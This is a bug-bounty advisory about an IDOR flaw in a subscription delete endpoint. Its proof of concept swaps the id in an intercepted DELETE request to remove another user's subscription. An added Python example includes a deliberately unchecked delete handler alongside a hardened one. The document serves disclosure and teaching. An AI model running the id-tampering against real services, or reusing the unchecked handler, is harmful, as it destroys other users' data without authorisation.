huntr report 19B6A951-138B-4F51-B81A-477852F855DE
IDOR make users can delete others' subscription

Published: 2023-04-17 10:55:11
Author: lujiefsi
Source: www.huntr.dev
Tags: idor, security vulnerability, unauthorized access, subscription, deletion, burpsuite, exploit, api, bug bounty

EPSS: 0.002 (percentile 61.1%)

Proof of Concept

1. user1 creates subscription1
2. user2 creates subscription2
3. user2 deletes subscription2
4. user2 uses Burp Suite to intercept the request
5. the intercepted request is DELETE /inlong/manager/api/consume/delete/2
6. change the request to DELETE /inlong/manager/api/consume/delete/1
   (1 is the id of subscription1; user2 is not the owner of subscription1)
7. result:

{"success":true,"errMsg":null,"data":true}
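The root cause in the steps above is a delete handler that authenticates the caller but never checks that the caller owns the record identified in the URL. The following is an added example, not InLong's code: a constructed in-memory subscription store with the two variants of the handler side by side. The store, the user names and the method names (delete_vulnerable, delete_checked, replay_report) are hypothetical; only the response shape is taken from the report.

```python
"""Added example (not part of the report or of Apache InLong): an
ownership check on a delete-by-id endpoint.

The caller identity must come from the authenticated session, never
from a request parameter, so that the only thing a user can vary is
the id in the URL, and that id is then checked against ownership.
"""
from dataclasses import dataclass, field


@dataclass
class Subscription:
    sub_id: int
    owner: str


@dataclass
class SubscriptionStore:
    """Constructed stand-in for the manager's subscription table."""
    _subs: dict = field(default_factory=dict)
    _next_id: int = 1

    def create(self, owner: str) -> int:
        """Create a subscription for `owner` and return its id."""
        sub_id = self._next_id
        self._next_id += 1
        self._subs[sub_id] = Subscription(sub_id, owner)
        return sub_id

    def exists(self, sub_id: int) -> bool:
        return sub_id in self._subs

    def delete_vulnerable(self, caller: str, sub_id: int) -> dict:
        """Mirrors the behaviour in the report: `caller` is authenticated
        but ignored, so any user can delete any id they can guess."""
        if sub_id not in self._subs:
            return {"success": False, "errMsg": "not found", "data": False}
        del self._subs[sub_id]
        return {"success": True, "errMsg": None, "data": True}

    def delete_checked(self, caller: str, sub_id: int) -> dict:
        """Hardened variant: the record is loaded first and its owner
        compared with the session identity before anything is deleted."""
        sub = self._subs.get(sub_id)
        # One response for both "no such id" and "not yours": a caller
        # cannot use the difference to confirm that a foreign id exists.
        if sub is None or sub.owner != caller:
            return {"success": False,
                    "errMsg": "subscription not found or not owned by caller",
                    "data": False}
        del self._subs[sub_id]
        return {"success": True, "errMsg": None, "data": True}


def replay_report(handler_name: str) -> tuple:
    """Replay steps 1-6 of the report against the named handler.

    Returns (success flag of user2's delete of subscription1,
             whether subscription1 still exists afterwards).
    """
    store = SubscriptionStore()
    sub1 = store.create("user1")   # step 1
    sub2 = store.create("user2")   # step 2
    handler = getattr(store, handler_name)
    handler("user2", sub2)         # step 3: own record, allowed either way
    result = handler("user2", sub1)  # step 6: tampered id
    return result["success"], store.exists(sub1)


def owner_can_delete(handler_name: str) -> bool:
    """Sanity check that the hardening does not break the legitimate path."""
    store = SubscriptionStore()
    sub1 = store.create("user1")
    result = getattr(store, handler_name)("user1", sub1)
    return result["success"] and not store.exists(sub1)


if __name__ == "__main__":
    print("vulnerable:", replay_report("delete_vulnerable"))  # (True, False)
    print("checked:   ", replay_report("delete_checked"))     # (False, True)
```

replay_report("delete_vulnerable") reproduces the report's outcome (the delete succeeds and subscription1 is gone); replay_report("delete_checked") returns failure and leaves subscription1 in place, while owner_can_delete shows the owner's own delete still works. In a real service the same ownership comparison belongs in the service layer, not only in the HTTP handler, so that every entry point to the delete operation inherits it.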
